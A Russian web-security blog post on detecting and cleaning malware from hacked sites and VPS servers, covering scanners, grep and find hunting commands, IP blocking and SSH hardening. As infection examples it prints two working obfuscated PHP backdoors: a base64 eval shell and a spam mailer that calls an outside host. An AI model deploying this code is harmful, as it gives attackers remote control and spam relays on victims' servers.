10 лет успеха: компания «Доктор Веб» вновь признана привлекательным работодателем по версии Superjob
17 ноября 2017 года Компания «Доктор Веб» получила статус привлекательного работодателя по результатам ежегодного исследования портала Superjob.ru. Награда 2017 года — своеобразный юбилей: в этом году компания «Доктор Веб» подтвердила свою особую значимость для соискателей десятый раз подряд. ...

Запомнить
iconРеклама
Домены banner HashFlare



У нас читают так же:
  • DLE&Zloyweb team
  • iconКалендарь
    «    Ноябрь 2017    »
    ПнВтСрЧтПтСбВс
     12345
    6789101112
    13141516171819
    20212223242526
    27282930 
    iconАрхив новостей
    Ноябрь 2017 (3)
    Октябрь 2017 (7)
    Сентябрь 2017 (7)
    Август 2017 (3)
    Июль 2017 (7)
    Май 2017 (4)
    Заголовоки
    тут самое интересное:

      Аптечка на все случаи жизни: от офиса до игр

      НУ уважаемые пользователи и подписчики свершилось. Ваши просьбы, мольбы и молитвы услышаны. Помните как часто у вас не запускается игра или программа из-за отсутствия того или иного системного компонента, рутинная переустановка операционной системы и всех её компонентов не помогала или помогала ценой потери времени и гигов гигов информации? Нашими партнерами создана АПТЕЧКА НА ВСЕ СЛУЧАИ
      Аптечка на все случаи жизни: от офиса до игр

      Как выжить на облачном майнинге? Не стать жертвой мошенников, пирамид, собственных иллюзий.

      Как выжить на облачном майнинге? Не стать жертвой мошенников, пирамид, собственных иллюзий. Сегодня мои читатели, тема от который я долго отмахивался – дескать при чем тут веб-безопасность. Есть же сайты про лохотроны, волшебные кошельки, мифические бесплатные бонусы и пр. пр. пр. халява (сыр в мышеловке). Но получив письмо от пользователя Сергея, ставшего жертвой именно фишингового сайта,
      Как выжить на облачном майнинге? Не стать жертвой мошенников, пирамид, собственных иллюзий.

      4 способа разобраться фальшив ли емейл

      Фишинг-атаки, наиболее распространенная форма мошенничества в Интернете, и не никто не застрахован от этого вида мошенничества.
      4 способа разобраться фальшив ли емейл

      вирус WannaCry - защита, лечение, удаление . Kaк зaщититься oт виpуca Wannacrуs.

      с 10, более маштабно с 12 мaя 2017 гoдa виpуc wannacrу поразил сотни тысяч компьютеров во всем мире под управлением Windows. wannacrу или «Xoчeтcя плaкaть!» атаковал без исключения весь мир. И так, что мы знаем про новый вирус, который косит без разбора компьютеры уже в 74 странах, оставляет без работы врачей, учителей, госслужащих, банки и серьёзные предприятия? Имя нового
      вирус WannaCry - защита, лечение, удаление . Kaк зaщититься oт виpуca Wannacrуs.

      Вирус .src от reg.ru, осторожно мошенники!

      На днях на email (почту) моего домена ( а так же других доменов, что и вызвало подозрение) пришло письмо, адресатом которого указан крупнейший в мире доменный регистратор рег.ру. Естественно, раз в отправителе указан адрес "abuse@reg.ru" я сразу же принялся разбираться и готовить ответ. Проверка сервера не выявила ни какой подозрительной активности, а в некоторые доменные зоны не имели вообще
      Вирус .src от reg.ru, осторожно мошенники!

      Статистика дня!!! вирусная активность

      Вирусная активность за сутки ежедневное обновление
      Статистика дня!!! вирусная активность

      онлайн проверка на вирус от zloyweb.ru

      Теперь прямо на сайте вы сможете онлайн проверить ваши файлы на вирусы и веб ресурсы и ссылки!!!! ВНИМАНИЕ Работает в тестовом режиме через сервер rambler проверка антивирусом касперского-бесплатно!!!! проверка файлов до 100 мб. [page=http://zloyweb.ru/antyvirus/forma.html]Проверка сайта онлайн и проверка файлов онлайн[/page]при отсутствии вирусов-вы будете возвращены на сайт!!! а это еще ряд
      онлайн проверка на вирус от zloyweb.ru
    Домены православие, храмы, монастыри, христианство, православная сеть блогов suzhdeno.ru

    Выделенные сервера, хостинг сайтов и VPS от Интернет Хостинг Центра
    HashFlare

    Автор: admin
    |
    Дата: 27.11.2016

    ЗАЩИТА ОТ СПАМА И ВИРУСОВ VDS(VPS)- сервера и сайтов

    ЗАЩИТА ОТ СПАМА И ВИРУСОВ VDS(VPS)- сервера и сайтов



    С недавних пор проблема безопасности и защиты сайтов (сервера) от вирусов, рассылки спама, iframe- вставок ссылок на фишинговые ресурсы, просто взлома и DDOS стало серьезной проблемой и хостеров и самих пользователей.
    Не так давно я писал о массовой атаке Ботов на сайты под управлением wordpress, DLE, phpbb 3.
    И дело уже не только в уязвимостях движка сайта, вопросах сложности паролей доступа к административным разделам и Базам MYSQL.
    Атакуют сам хостинг, атакуют Линукс, Виндовс платформы.

    СРАЗУ ПРЕДВИДЯ ВАШИ ВОПРОСЫ СКАЖУ: МЫ ПОМОГАЕМ БЕСПЛАТНО УДАЛЯТЬ ВИРУСЫ И ОПАСНЫЕ ВСТАВКИ.


    Я готовлю статью по защите сайтов и сервера, а пока хочу остановиться на вопросах поиска и удаления опасных скриптов, вставок в Ваши файлы, инъекции вредоносного кода в базы данных.

    Словом рассмотрим случай заражения опасными вирусами и подозрительными скриптами и php-вставками Вашего сайта.

    Итак, первые признаки непорядка с Вашими сайтами и сервером:
    - Ваш хостер Вам присылает сообщения о высокой нагрузке на сервер, уведомление о получении жалобы на спам-рассылки с Ваших сайтов;
    - Ваши сайты стали долго грузиться, поисковые системы считают Ваши сайты небезопасными;
    - Вы заметили при просмотре кода загружаемой страницы Ваш_сайт/index.html наличие неизвестных Вам ссылок;
    - Вы получаете сотни сообщений о недоставленной почте, при этом рассылки и сообщения пользователям не направляли;
    - резко сократился трафик, особенно с мобильных устройств (возможно пользователь чем-то недоволен попадая на Ваш сайт;
    - при просмотре сайтов в файловых менеджерах вы заметили появление новых файлов (наиболее часто они имеют к общедоступному название и цифровую приписку: index56.php, list77.php, blog55.php и другие).
    и другие косвенные и прямые признаки непорядка.

    Но не все так страшно, давайте просто возьмем себя в руки и проверим Ваш сайт на вирусы и прочие гадости которые мы могли получить после взлома или просто в наследство в шаблоне или модуле, скаченным непонятно откуда (типа бесплатно платное-сыр в мышеловке):

    1.Айболит сканер первое, что я рекомендую. Можно запустить прямо из браузера проверку, но я рекомендую скачать с сайта универсальную версию для хостинга, а также для Mac OS X и Unix.
    2. Антивирус от Яндекс Manul. Хотя поддержки и развития проекта больше ждать не приходится, но работает Manul не хуже Ай-болита. Я рекомендую использовать и Айболит и Манул. Были случаи, когда что-то находил Айболит, а что-то более успешно определял Манул.
    Сразу спешу предупредить, что не все подозрительное, реально опасные вставки и прочие гадости на Ваших сайтах. Например, многие платные шаблоны и модули используют кодирование Base_64:
    /.*/e eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));


    так же $GLOBALS (Ассоциативный массив (array), содержащий ссылки на все переменные глобальной области видимости скрипта, определенные в данный момент. Имена переменных являются ключами массива) может быть, как частью дистрибутива drupal или шаблона, или просто массива:
    Примеры
    Пример #1 Пример $GLOBALS
    <?php
    function test() {
        $foo = "local variable";
    
        echo '$foo in global scope: ' . $GLOBALS["foo"] . "\n";
        echo '$foo in current scope: ' . $foo . "\n";
    }
    
    $foo = "Example content";
    test();
    ?>
    Результатом выполнения данного примера будет что-то подобное:
    $foo in global scope: Example content
    $foo in current scope: local variable

    так и частью вирусного кода:
    <?php $GLOBALS['_605166492_']=Array(base64_decode('Z' .'m9wZW4='),base64_decode('c3RyZWFtX2dl' .'dF9jb250ZW50c' .'w=='),base64_decode('Z' .'mNsb3N' .'l'),base64_decode('bWFpbA=='),base64_decode('YmFzZ' .'TY0X2' .'Rl' .'Y2' .'9' .'kZQ=='),base64_decode('YmFz' .'ZTY0X' .'2' .'RlY29kZQ' .'=' .'=')); ?><?php function _657184174($i){$a=Array('ODdkNzIwZDVlZmVjNjRhYmU5MzM3MDQ5MTFkNjk3MzM=','a2V5','aHR0cDovL2J1c21haWwucnUvc3RhdHk=','cg==','a2V5','dG8=','dGg=','bXM=','aHM=');return base64_decode($a[$i]);} ?><?php $key=_657184174(0);if(empty($_POST[_657184174(1)])){$stream=$GLOBALS['_605166492_'][0](_657184174(2),_657184174(3));echo $GLOBALS['_605166492_'][1]($stream,-1);$GLOBALS['_605166492_'][2]($stream);}if($_POST[_657184174(4)]==$key){$sd=$GLOBALS['_605166492_'][3]($_POST[_657184174(5)],$_POST[_657184174(6)],@$GLOBALS['_605166492_'][4]($_POST[_657184174(7)]),@$GLOBALS['_605166492_'][5]($_POST[_657184174(8)]));if($sd){echo 1;exit();}else{echo 2;exit();}}else{echo 3;exit();} ?> Источник: http://www.masterwebs.ru/topic/16796-vlijanie-virusov-na-poiskovoe-ranzhirovanie/


    3. Если у Вас имеется VDS (VPS) сервер сразу же устанавливает или из панели управления хостинга или самостоятельно 2 антивируса.
    Clam и maldet

    
    ищем вирусы : maldet -a /var/www/Ваш_сайт/
    ищем измененные файлы: maldet -r/var/www/Ваш_сайт/  
    Смотрим отчет: 
    #maldet --report 091713-1715.24128
    Принудительно обновляем базы с rfxn.com:
    #maldet -u
    Принудительно обновляем версию с rfxn.com:
    #maldet -d
    Так же несложно провести проверку и Clam-антивирусом
    sudo clamscan -r  /var/www/Ваш_сайт/ -i  –bell –max-dir-recursion 50  –log=/usr/local
    sudo clamscan -ir /var/www/Ваш_сайт/
    sudo clamscan / -i --recursive=yes --cross-fs=yes 

    Вот скрины работы:




    4. Не забываем, про базы данных.

    Возможно злоумышленник добавил код в базу данных. Это будет только в том случае если ваш скрипт хранит пользовательский код, например плагины, в базе данных. Так делает vBulletin. Хотя это бывает редко, но вы должны это знать. Если вы в этом случае были взломаны, то злоумышленник вероятно вставить iframe в таблицы, которые отображают данные на вашем сайте.

    В этом примере мы будем использовать mysql или его производные.

    Для этого я бы хотел воспользоваться PHPMyAdmin и это для меня не обычно, я предпочитаю использовать инструменты командной строки, кода они доступны, однако этот инструмент является удобным для поиска.

    Лично я не запускаю PHPMyAdmin на рабочем сервере, я скачиваю копию базы данных и запускаю ее на локальном сервере. Если база данных большая, не рекомендуется искать небольшие куски текста на рабочем сервере.

    Откройте PHPMyAdmin выберите базу данных и нажмите 'Search'. Вы можете искать такие строки как %base64_% и %eval(%, и любые другие сочетания, которые я уже изложил.

    5. Проверьте .htaccess файлы, если вы используете Apache

    Если вы используете веб-сервер Apache, проверьте .htaccess файлы на подозрительные изменения.

    Вообще по SHH можно буквально несколькими командами поискать сомнительные файлы или вставки в них:
    ищем шеллы
    cd /var/www/p2610/data/www
    grep -RPn "(passthru|shell_exec|system|base64_decode|fopen|fclose|eval)" /var/www/p2610/data/www/ > /var/www//p2610/data/www/backlist.txt


    При взломе сервера полезно проанализировать файлы, у которых установлен guid/suid флаг
    ps -aux  процессы netstat -avnp  что делают
    find / -perm -4000 -o -perm -2000
    $ find ./ -name "*.php" | xargs ls -la | grep "Nov 22"    по дате
    $ find ./ -name "db87.php" | xargs ls -la |  по имени
    $ find ./ -name "*.php" | xargs ls -la | grep "Nov 14" | awk '{print $9}' | xargs grep "eval(base6"  подате на баз
     $ find ./ -name "*.php" | xargs ls -la | grep "Oct 7"
    $ find ./ -name "*.php" | xargs ls -la | grep "Oct 15" | awk '{print $9}' | xargs grep "eval(base6"
    Для проверки логов на наличие обращений к вредоносным файлам необходимо выполнить следующие команды: 
    
    $ cd ~
    $ cd /logs/
    $ cat ./domain.com.access.log. | grep POST


    Идем в атаку:
    блокируем ай пи, которые замечены в логах в обращениях к скриптам с вирусами и кодами рассылки спама:
    iptables -A INPUT -s 112.196.185.20 -j REJECT
    sudo iptables -A INPUT -s 85.93.5.78 -j DROP
    sudo iptables -n -L -v --line-numbers правила кто заблокирован
    Linux хранит информацию о сессиях в трех файлах

    Так же полезно знать:
    /var/run/utmp - данный о текущих (активных в данный момент) сессиях
    /var/log/wtmp - данные о предыдущих (завершенных в данный момент) сессиях
    /var/log/btmp - данные о неудачных попытках входа
    Команда last. Смотрим кто входил на сервер кроме Вас, включая вас.

    Рекомендую так же: утилиту - rkhunter

    установка не должна занять много времени, после которой необходимо обновить базу данных сигнатур командой:
    sudo rkhunter --update
    Чтобы запустить проверку операционной системы, необходимо выполнить команду:
    sudo rkhunter --check
    По умолчанию после каждого теста нужно нажимать любую клавишу для того, чтобы успеть ознакомится с промежуточными результатами, если этого не требуется, то можно запустить проверку с ключом --sk:
    sudo rkhunter --check --sk

    Не забываем менять все пароли к хостингу, ФТП (я бы рекомендовал только SHH-доступ) и админкам сайтов.
    Если вы используете программы доступа по ФТП и SHH не сохраняйте Ваши пароли в них (особенно уязвим Total Commander) и почаще проверяйте антивирусом Ваш ПК.
    Кстати Касперский неплохо распознает php - вирусы и я рекомендую скачивать архивы и проверять файлы этим файловым антивирусом.

    Рекомендую доступ к админкам организовать только для Вашего Ip. При этом уточните динамический или статический у Вас IP адрес не на сервере!!!!, а именно в компьютерной сети Вашего провайдера интернета и по возможности закажите статический. Тогда вы сможете прописать доступ только для Вашего Ip.

    Еще настойчиво рекомендую ограничить доступ по SSH!

    !!!! Все изменения вносятся в /etc/ssh/sshd_config
    Чтобы изменения вступили в силу, необходимо перезагрузить SSH!!!!


    1. Сменить порт

    Port 9724

    Теперь при авторизации вам нужно вместо стандартного 22 порта указывать 9724.
    Способ очень простой и действенный против большинства простых ботов хакеров, которые стучатся в стандартные порты. Тут главное не создать конфликт с другими службами и подобрать заведомо неиспользуемое число.

    2. Запретить авторизацию под root


    PermitRootLogin no

    По умолчанию no. Если yes, можно авторизовываться под рутом. Под root работать небезопасно, лучше создать своего пользователя и работать под ним.

    3. Уменьшить число попыток авторизации
    
    MaxAuthTries 2

    Количество попыток ввода пароля. По умолчанию 6. При неудачном переборе сеанс связи обрывается.

    4. Уменьшить время ожидания авторизации
     
    LoginGraceTime 30s

    По умолчанию, 120 секунд может длиться сеанс авторизации. По истечению этого времени он обрывается. 2 минуты на авторизацию — это перебор, всё это время сервер держит связь открытой, что очень нерационально. Полминуты за глаза хватит.

    SSH — настройка доступа к серверу, команды и подключение без паролей
    05.11.2016


    SSH (Secure Shell) — это сетевой протокол, предназначенный для удалённого управления сервером и передачи данных по зашифрованным TCP соединениям. Большинство хостингов, даже shared, сегодня предоставляет доступ как по FTP, так и по SSH. На мой взгляд, это здорово, SSH намного удобнее и безопаснее в использовании.

    ВНИМАНИЕ!!!:
    В результате внесения неправильных изменений в конфигурационный файл вы можете потерять доступ к серверу по ssh, поэтому убедитесь, что у вас есть альтернативные варианты для доступа к нему, например, с помощью панели управления ISPManager



    Так же рекомендую и это:
    Закрыть доступ по IP

    Если доступ нужен только вам, самым простым и надёжным будет закрыть доступ отовсюду, кроме вашего IP или, если он динамический, то диапазона IP.

    Открываем /etc/hosts.allow и добавляем туда

    SSHD: 192.168.1.1

    где 192.168.1.1 — ваш IP. Если у вас динамический IP, определите IP с маской подсети и запишите вместо IP, например


    SSHD: 192.168.0.0/16

    Открываем /etc/hosts.deny и добавляем туда

    SSHD: ALL

    Теперь никто, кроме вас, не сможет авторизоваться на сервере по SSH.

    5. Авторизация SSH по ключам

    Намного безопаснее, удобнее и правильнее будет настроить ssh авторизацию без пароля. Для этого будет использоваться авторизация по ключу. Например с программой Putty.
    В кратце и не в кратце это почти все. Но нет приделу совершенству, которое ограничивает только Ваша паранойя и реальная ситуация.

    Команда сайта zloyweb.ru оказывает помощь в поиске вирусов и работает как с Вашими файлами и архивами, так и проверяет сервер и базы данных на уязвимости и вредоносные коды. Друзья Мы сможем в короткие сроки организовать мониторинг сервера, антивирусную проверку сайтов и лечение. Не всегда нужны пароли и доступ (но всегда вы можете это предоставить и потом сменить, сверив образы и просмотря лично все наши изменения - отчет представим!!!).

    Проверка сайта на вирусы и поиск - удаление вирусов абсолютно бесплатны.

    Так же за плату мы поможем настроить сервер с установкой необходимых утилит и скриптов для защиты от взлома и установки вредоносных скриптов. Работаем с сайтами на Dle, phpbb3, word press, drupal и другими. Настраиваем модули и хаки для защиты Ваших сайтов. Цена 500 рублей час. Как правило настройка и установка защиты осуществляется в течении часа.




    По всем вопросам пишите в ЛС.
    Комментариев: 1
    Просмотров: 4 801
    • 0

    Похожие новости:

    Dr.Web Security Space Pro для Windows 8

    Dr.Web Security Space Pro для Windows 8

    Dr.Web Security Space - безопасное средство для защиты компьютера. Оно является отличным решением для комплексной защиты вашего ПК от вирусов, интернет-угроз, руткитов, хакерских утилит, почтовых
    Прокси серверы становятся более популярными

    Прокси серверы становятся более популярными

    Миллионы интернет-пользователей обращаются к прокси-серверам по различным причинам.
    Kaspersky Internet Security 2011

    Kaspersky Internet Security 2011

    Стала доступной для загрузки свежая версия культового антивируса всех времен и народов Kaspersky Internet Security 2011 Это не просто одна из лучших и самая модная антивирусная программа! Это
    Были взломаны сервера обслуживающие WordPress.com

    Были взломаны сервера обслуживающие WordPress.com

    Проект WordPress.com официально признал факт взлома инфраструктуры своих серверов. В официальном заявлении сказано, что злоумышленники проникли на несколько серверов, получили права
    Выпуск Dr.Web для IBM Lotus Domino 5.0.0 под Linux

    Выпуск Dr.Web для IBM Lotus Domino 5.0.0 под Linux

    9 ноября 2009 года Компания «Доктор Веб» — российский разработчик средств информационной безопасности — выпустила решение Dr.Web для IBM Lotus Domino 5.0.0 под Linux. Продукт предназначен для защиты

    Комментарии (1)

    Добавить комментарий!

    1. admin
      06 март 2017 21:05
      Если Моя статья сложна для понимания то есть решение,
      для проверки Вам достаточно воспользоваться следующими скриптами:

      Ai-bolit от компании Revisium
      Linux Malware Detect
      Антивирус для сайтов Manul от Yandex
      успехов и процветания Вам и Вашим сайтам !!! laughing
      bowtie
      bowtie
      bowtie


      --------------------

    Информация
    Посетители, находящиеся в группе Прохожий, не могут оставлять комментарии к данной публикации.